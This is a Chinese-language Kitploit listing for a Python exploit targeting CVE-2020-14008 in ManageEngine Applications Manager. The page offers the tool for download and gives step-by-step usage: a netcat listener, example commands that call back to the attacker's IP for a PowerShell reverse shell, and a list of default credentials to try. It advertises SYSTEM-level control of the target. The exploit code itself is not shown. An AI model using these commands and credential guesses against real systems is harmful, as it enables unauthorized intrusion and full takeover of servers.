Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
cve-2020-14008 — 针对ManageEngine Applications Manager中CVE-2020-14008的Python漏洞利用工具,通过认证远程代码执行实现SYSTEM级别反向Shell。 | Kitploit
工具/GitHubGitHub/jackhars/cve-2020-14008
权限提升Payload生成漏洞分析漏洞利用Web应用程序漏洞利用渗透测试远程访问工具
GitHubjackhars/cve-2020-14008

cve-2020-14008

针对ManageEngine Applications Manager中CVE-2020-14008的Python漏洞利用工具,通过认证远程代码执行实现SYSTEM级别反向Shell。

查看仓库
421年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2020-14008 ManageEngine 漏洞利用

这是什么?

此脚本利用 ManageEngine Applications Manager 中的 CVE-2020-14008 漏洞来获取具有 SYSTEM 权限的反向 shell。

依赖要求

root@kitploit:~
pip3 install requests urllib3

如何使用

1. 启动监听器

root@kitploit:~
nc -nlvp 9001

2. 运行漏洞利用脚本

root@kitploit:~
python3 cve-2020-14008-exploit.py <target_url> <username> <password> <your_ip> <your_port>

示例

root@kitploit:~
# 直接攻击
python3 cve-2020-14008-exploit.py https://192.168.1.100:8443 admin admin 192.168.1.50 9001

# 通过端口转发
python3 cve-2020-14008-exploit.py https://localhost:8443 admin admin 127.0.0.1 9001

常见尝试凭据

  • admin:admin
  • administrator:administrator
  • guest:guest

你将获得

  • PowerShell 反向 shell
  • 目标上的 SYSTEM 权限
  • 完全控制 ManageEngine 服务器
下载工具